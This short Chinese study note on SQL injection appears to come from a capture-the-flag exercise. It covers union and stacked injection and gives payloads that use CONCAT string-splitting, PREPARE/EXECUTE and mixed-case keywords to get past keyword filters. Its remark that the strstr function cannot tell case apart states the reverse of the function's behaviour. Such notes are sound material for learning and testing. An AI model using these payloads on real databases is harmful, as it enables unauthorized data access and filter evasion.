SQL注入

常用的注入，有联合注入与堆叠注入。
联合注入即为 1’ or 1 union 注入语句#
堆叠注入即为 1’ or 1；注入语句#
注入中的预编译方法：
set是设置一个新列
prepare是进行定义一个语句
execute是执行
playload:

set @sql = CONCAT('se','lect * from `1919810931114514`;');prepare stmt from @sql;EXECUTE stmt;

若遇到区分大小写等，如这里用strstr函数过滤了set和prepare关键词，但strstr这个函数并不能区分大小写，我们将其大写即可。

sEt @sql = CONCAT('se','lect * from `1919810931114514`;');prEpare stmt from @sql;EXECUTE stmt;#